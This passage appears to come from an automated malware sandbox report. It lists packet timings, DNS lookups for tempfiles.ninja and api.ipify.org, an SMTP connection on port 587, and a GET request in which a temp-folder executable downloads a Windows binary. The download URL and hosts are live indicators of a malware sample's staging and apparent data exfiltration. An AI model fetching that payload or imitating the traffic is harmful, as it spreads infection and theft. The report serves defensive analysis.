                                                              Oct 7, 2024 18:05:54.160173893 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.160731077 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.160748959 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.160797119 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.160803080 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.160837889 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.161386013 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.161406994 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.161443949 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.161459923 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.161464930 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.161495924 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.162910938 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.162936926 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.162981033 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.162986994 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.163009882 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.164457083 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.164478064 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.164527893 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.164535046 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.164544106 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.196470022 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:54.201374054 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:05:54.206314087 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:54.209707022 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.214359045 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.214378119 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.214412928 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.214426041 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.214533091 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.214559078 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.214587927 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.214598894 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.242065907 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.242084026 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.242124081 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.242228985 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.242245913 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.242273092 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.242281914 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.242671967 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.242690086 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.242714882 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.242721081 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.242748022 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.242764950 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.243340015 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.243357897 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.243410110 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.243417025 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.243457079 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.243941069 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.243957043 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.243989944 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.243994951 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.244021893 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.244036913 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.244544029 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.244561911 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.244609118 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.244615078 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.244647980 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.246334076 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.246356964 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.246413946 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.246419907 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.246454954 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.247114897 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.247133970 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.247172117 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.247178078 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.247203112 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.247216940 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.297429085 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.297462940 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.297523022 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.297540903 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.297579050 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.326754093 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.326781034 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.326922894 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.326940060 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.326982021 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.327022076 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.327037096 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.327083111 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.327090025 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.327124119 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.327773094 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.327790022 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.327828884 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.327836037 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.327874899 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.327889919 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.328438997 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.328454018 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.328507900 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.328514099 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.328551054 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.329083920 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.329097986 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.329148054 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.329155922 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.329195023 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.329426050 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.329442024 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.329483032 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.329489946 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.329525948 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.330620050 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.330634117 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.330705881 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.330714941 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.330759048 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.344960928 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.357970953 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:54.368861914 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:05:54.375176907 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:54.380228996 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.380259991 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.380326033 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.380341053 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.380387068 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.408937931 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.409024000 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.409046888 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.409439087 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.409456968 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.409495115 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.409502029 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.409532070 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.410276890 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.410294056 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.410378933 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.410387993 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.410691023 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.410706997 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.410739899 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.410747051 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.410772085 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.410945892 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.410959959 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.410995960 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.411001921 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.411029100 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.411746979 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.411763906 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.411796093 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.411802053 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.411815882 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.412477970 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.412492990 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.412529945 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.412538052 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.412558079 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.413412094 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.413428068 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.413465023 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.413470030 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.413501978 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.416007996 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.416286945 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.491909027 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.491945028 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.492072105 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.492090940 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.492130041 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.495507002 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495527983 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495573997 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495595932 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.495613098 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495630980 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495645046 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.495646000 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495666027 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495671034 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.495678902 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495706081 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.495708942 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495728970 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495754004 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.495759964 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495774984 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495775938 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.495790958 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495815039 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.495821953 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495831013 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495843887 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.495850086 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495874882 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.495881081 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495908976 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.496566057 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.496581078 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.496609926 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.496615887 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.496635914 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.502085924 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.532505989 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:54.542053938 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:05:54.547111988 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:54.575930119 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.575958967 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.576066017 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.576083899 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.576117039 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.576504946 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.576524019 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.576569080 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.576575041 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.576606989 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.577230930 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.577250004 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.577299118 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.577305079 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.577342033 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.577780962 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.577797890 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.577857971 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.577863932 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.577931881 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.578408957 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.578432083 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.578471899 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.578476906 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.578504086 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.578524113 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.579174042 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.579191923 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.579251051 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.579257011 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.579288960 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.580482960 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.580503941 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.580552101 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.580560923 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.580584049 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.580600023 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.582258940 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.582283974 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.582324028 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.582333088 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.582359076 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.582374096 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.614648104 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.657602072 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.657632113 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.657686949 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.657706022 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.657716990 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.658145905 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.658174992 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.658199072 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.658206940 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.658222914 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.658252001 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.658624887 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.658648014 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.658685923 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.658690929 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.658703089 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.658725023 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.659348011 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.659379005 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.659406900 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.659413099 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.659432888 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.659447908 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.659706116 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.659749031 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.659749985 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.659770012 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.659790039 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.659806967 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.659810066 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.659842014 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.659879923 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.684561968 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.700805902 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:54.700965881 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:05:54.705908060 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:55.862061977 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:55.862219095 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:05:55.867662907 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:56.018927097 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:56.019560099 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:05:56.019609928 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:05:56.019628048 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:05:56.019640923 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:05:56.024772882 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:56.024786949 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:56.024804115 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:56.024811983 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:56.290463924 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:56.332833052 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:07:33.332895994 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:07:33.337723017 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:07:33.489494085 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:07:33.489649057 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:07:33.489717007 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:07:33.489717007 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:07:33.494689941 CEST58749733162.254.34.31192.168.2.4

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 7, 2024 18:05:51.992147923 CEST5615953192.168.2.41.1.1.1
                                                              Oct 7, 2024 18:05:52.068525076 CEST53561591.1.1.1192.168.2.4
                                                              Oct 7, 2024 18:05:52.069196939 CEST5754153192.168.2.41.1.1.1
                                                              Oct 7, 2024 18:05:52.078591108 CEST53575411.1.1.1192.168.2.4

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Oct 7, 2024 18:05:51.992147923 CEST192.168.2.41.1.1.10xbb61Standard query (0)tempfiles.ninjaA (IP address)IN (0x0001)false
                                                              Oct 7, 2024 18:05:52.069196939 CEST192.168.2.41.1.1.10xeaeaStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Oct 7, 2024 18:05:52.068525076 CEST1.1.1.1192.168.2.40xbb61No error (0)tempfiles.ninja104.21.56.249A (IP address)IN (0x0001)false
                                                              Oct 7, 2024 18:05:52.068525076 CEST1.1.1.1192.168.2.40xbb61No error (0)tempfiles.ninja172.67.157.59A (IP address)IN (0x0001)false
                                                              Oct 7, 2024 18:05:52.078591108 CEST1.1.1.1192.168.2.40xeaeaNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                              Oct 7, 2024 18:05:52.078591108 CEST1.1.1.1192.168.2.40xeaeaNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                              Oct 7, 2024 18:05:52.078591108 CEST1.1.1.1192.168.2.40xeaeaNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • tempfiles.ninja
                                                              • api.ipify.org

                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.449731104.21.56.2494437392C:\Users\user\AppData\Local\Temp\docdd.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-07 16:05:52 UTC116OUTGET /d/4wmb3QgRfXU5M4s2/bHzsEUNaVOT3WXU2lPvPRcIphVFu9mJr HTTP/1.1
                                                              Host: tempfiles.ninja
                                                              Connection: Keep-Alive
                                                              2024-10-07 16:05:52 UTC936INHTTP/1.1 200 OK
                                                              Date: Mon, 07 Oct 2024 16:05:52 GMT
                                                              Content-Type: application/x-msdownload
